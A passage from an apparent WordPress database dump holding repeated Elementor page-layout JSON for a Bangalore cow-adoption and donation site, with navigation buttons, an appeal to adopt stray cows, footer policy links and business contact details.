":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"8aaabba\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"72051db\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"26e5a5b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"c20d2f2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"9230eae\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"f509e14\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"f468db2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"2250764\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c479969\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ad82ec2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"61e999c\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=1 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87f91ce\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"9860375\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"c30f35b\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"c6d2d93\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c0c7458\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"2eb3085\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41d39d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1ec00ae\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"58263a0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1fe19cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a8042dd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"41de25e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e80cac0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ab4d180\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6e6c805\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"46484d1\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"28e175b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ba2145a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(11948,1981,'_elementor_page_assets','a:0:{}'),(11950,1982,'_elementor_edit_mode','builder'),(11951,1982,'_elementor_template_type','wp-page'),(11952,1982,'_elementor_version','3.7.8'),(11953,1982,'_wp_page_template','elementor_canvas'),(11954,1982,'_elementor_data','[{\"id\":\"442ae7f\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"27b1818\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"b4f0fda\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"69a6cbf\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"79e4ef4\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2424986\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"8aaabba\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"72051db\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"26e5a5b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"c20d2f2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"9230eae\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"f509e14\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"f468db2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"2250764\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c479969\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ad82ec2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"61e999c\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=1 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87f91ce\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"9860375\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"c30f35b\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"c6d2d93\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c0c7458\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"2eb3085\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41d39d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1ec00ae\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"58263a0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1fe19cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a8042dd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"41de25e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e80cac0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ab4d180\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6e6c805\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"46484d1\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"28e175b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ba2145a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(11955,1982,'_elementor_page_assets','a:0:{}'),(11957,1983,'_elementor_edit_mode','builder'),(11958,1983,'_elementor_template_type','wp-page'),(11959,1983,'_elementor_version','3.7.8'),(11960,1983,'_wp_page_template','elementor_canvas'),(11961,1983,'_elementor_data','[{\"id\":\"442ae7f\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"27b1818\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"b4f0fda\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"69a6cbf\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"79e4ef4\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2424986\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_we